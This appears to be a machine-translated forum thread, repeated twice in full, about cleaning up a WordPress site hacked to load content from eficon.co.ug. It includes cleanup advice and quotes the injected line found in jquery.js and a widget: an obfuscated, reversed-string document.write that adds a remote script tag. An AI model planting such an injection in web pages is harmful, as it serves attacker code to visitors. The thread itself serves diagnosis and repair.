Eficon.co.ug 恶意软件问题
Eficon.co.ug Malware issue
当我尝试登录我的 wordpress 应用程序时,我收到来自 Google Chrome 的恶意软件警告,检测到我网站上来自 eficon.co.ug 的内容。
我制作了一些脚本来扫描站点,发现它是通过一个名为 admin_print_scripts 的函数实现的。
然后我制作了另一个脚本来确定此函数出现在哪些文件中:
/wp-content/plugins/woocommerce/admin/post-types/shop_order.php
/wp-content/themes/twentyfourteen/functions.php
/wp-includes/default-filters.php
/wp-admin/includes/template.php
/wp-admin/includes/media.php
/wp-admin/admin-header.php
/wp-admin/press-this.php
/wp-admin/custom-header.php
我查看了这些文件,一无所获。
有没有人尝试过类似的事情并找到了解决方案??
干杯。
得知您的网站已损坏,我们深表遗憾。如果您有无恶意软件的备份,恢复是让您的站点重新运行的最简单和最快的方法。
如果备份不可用并且您的站点没有经过高度修改,那么从完全 全新安装 WordPress 核心、插件和主题开始是第二好的选择.我会将损坏帐户中 public_html 中的所有内容下载到您 PC 上的一个文件夹中,然后完全删除 public_html。然后在全新安装并仔细搜索数据库中的恶意软件后重新连接您的数据库。
如果您最近有大量数据更改、经过高度修改的模板(或其他文件)并且没有备份,您需要自行查找并删除所有 恶意软件.正如您已经发现的那样,既有原始安装中没有的文件,也有安装时附带但现在已修改的文件。
有许多不错的插件可以帮助您找到坏文件并修复您的站点。 Wordfence 将扫描您的站点以查找恶意代码。它会告诉您是否可以删除文件或将文件重置为原始状态。请务必查看该文件以确保 Wordfence 找到了错误代码而不是您的修改之一。 Wordfence 有一个内置的比较文档功能来帮助完成这项任务。
这不是一件容易的事。您必须找到黑客添加或更改的所有内容。如果不这样做,您的站点可能会再次损坏。不要仅仅因为您的站点似乎 working.You 想要 运行 从不同的插件中扫描尽可能多的服务器端恶意软件而停止寻找。 Wordfence 是一个非常好的产品,但它可能无法找到所有错误代码。
清理文件后请记住。您仍然需要确保数据库没有恶意软件。
https://wordpress.org/support/ 上有一个很好的 WordPress 站点资源。加入并在论坛中搜索 "hacked site"。那里有很多人可以提供帮助和大量信息。
祝你维修顺利。
我们的网站今天早上也遭到入侵,经过数小时的搜索,我们将其追踪到位于 /wp-includes/js/jquery/jquery.js
的 jquery.js
在 jQuery 库的底部有这段烦人的代码:
document.write('>tpircs/<>"/rcs/gu.oc.nocife//:ptth"=crs tpircs<'.split("").reverse().join(""))
我们不确定网站是如何被入侵的,但我们仍在寻找。
我搜索了我网站的 WordPress 数据库,并通过在所有表中搜索 "gu.oc" 找到了与上面相同的代码。我在主页上的文本小部件中发现了烦人的代码。从测试小部件中删除这行代码后,Chrome 不再在我的网站上声明恶意软件。
当我尝试登录我的 wordpress 应用程序时,我收到来自 Google Chrome 的恶意软件警告,检测到我网站上来自 eficon.co.ug 的内容。
我制作了一些脚本来扫描站点,发现它是通过一个名为 admin_print_scripts 的函数实现的。
然后我制作了另一个脚本来确定此函数出现在哪些文件中:
/wp-content/plugins/woocommerce/admin/post-types/shop_order.php
/wp-content/themes/twentyfourteen/functions.php
/wp-includes/default-filters.php
/wp-admin/includes/template.php
/wp-admin/includes/media.php
/wp-admin/admin-header.php
/wp-admin/press-this.php
/wp-admin/custom-header.php
我查看了这些文件,一无所获。
有没有人尝试过类似的事情并找到了解决方案??
干杯。
得知您的网站已损坏,我们深表遗憾。如果您有无恶意软件的备份,恢复是让您的站点重新运行的最简单和最快的方法。
如果备份不可用并且您的站点没有经过高度修改,那么从完全 全新安装 WordPress 核心、插件和主题开始是第二好的选择.我会将损坏帐户中 public_html 中的所有内容下载到您 PC 上的一个文件夹中,然后完全删除 public_html。然后在全新安装并仔细搜索数据库中的恶意软件后重新连接您的数据库。
如果您最近有大量数据更改、经过高度修改的模板(或其他文件)并且没有备份,您需要自行查找并删除所有 恶意软件.正如您已经发现的那样,既有原始安装中没有的文件,也有安装时附带但现在已修改的文件。
有许多不错的插件可以帮助您找到坏文件并修复您的站点。 Wordfence 将扫描您的站点以查找恶意代码。它会告诉您是否可以删除文件或将文件重置为原始状态。请务必查看该文件以确保 Wordfence 找到了错误代码而不是您的修改之一。 Wordfence 有一个内置的比较文档功能来帮助完成这项任务。
这不是一件容易的事。您必须找到黑客添加或更改的所有内容。如果不这样做,您的站点可能会再次损坏。不要仅仅因为您的站点似乎 working.You 想要 运行 从不同的插件中扫描尽可能多的服务器端恶意软件而停止寻找。 Wordfence 是一个非常好的产品,但它可能无法找到所有错误代码。
清理文件后请记住。您仍然需要确保数据库没有恶意软件。
https://wordpress.org/support/ 上有一个很好的 WordPress 站点资源。加入并在论坛中搜索 "hacked site"。那里有很多人可以提供帮助和大量信息。
祝你维修顺利。
我们的网站今天早上也遭到入侵,经过数小时的搜索,我们将其追踪到位于 /wp-includes/js/jquery/jquery.js
的 jquery.js在 jQuery 库的底部有这段烦人的代码:
document.write('>tpircs/<>"/rcs/gu.oc.nocife//:ptth"=crs tpircs<'.split("").reverse().join(""))
我们不确定网站是如何被入侵的,但我们仍在寻找。
我搜索了我网站的 WordPress 数据库,并通过在所有表中搜索 "gu.oc" 找到了与上面相同的代码。我在主页上的文本小部件中发现了烦人的代码。从测试小部件中删除这行代码后,Chrome 不再在我的网站上声明恶意软件。